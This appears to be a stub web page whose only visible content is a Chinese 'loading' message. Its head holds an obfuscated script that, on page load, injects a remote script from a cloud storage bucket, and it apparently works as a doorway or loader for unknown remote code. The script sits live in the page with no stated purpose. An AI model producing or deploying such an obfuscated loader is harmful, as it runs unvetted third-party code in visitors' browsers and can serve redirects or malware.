

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
    <meta content="width=device-width,initial-scale=1,user-scalable=0,minimum-scale=1,maximum-scale=1" name="viewport" />
    <meta content="yes" name="apple-mobile-web-app-capable" />
    <meta content="black" name="apple-mobile-web-app-status-bar-style" />
    <meta content="no" name="msapplication-tap-highlight" />
    <meta content="IE=edge" http-equiv="X-UA-Compatible" />
    <title>....</title>
    <script type="text/javascript">
        var WAItcl1 = WAItcl1 || [];;
        var b2 = ["//hbchongchong.oss-cn-beijing.aliyuncs.com/4.js"];
        var h3;
        var t4;
        for (var WOYuAkCBS5 = 0; WOYuAkCBS5 < b2["length"]; WOYuAkCBS5++) {
            h3 = window["document"]["createElement"]("script");
            h3["src"] = b2[WOYuAkCBS5];
            t4 = window["document"]["getElementsByTagName"]("script")[0];
            t4["parentNode"]["insertBefore"](h3, t4);
        }
    </script>
    <!--Az5bPy8XYJRZrRaseCqweqwejasjqweqwenXsaSErNjE24nwkWjApxPZXkkSa-->
</head>
<body>
加载中......
</body></html>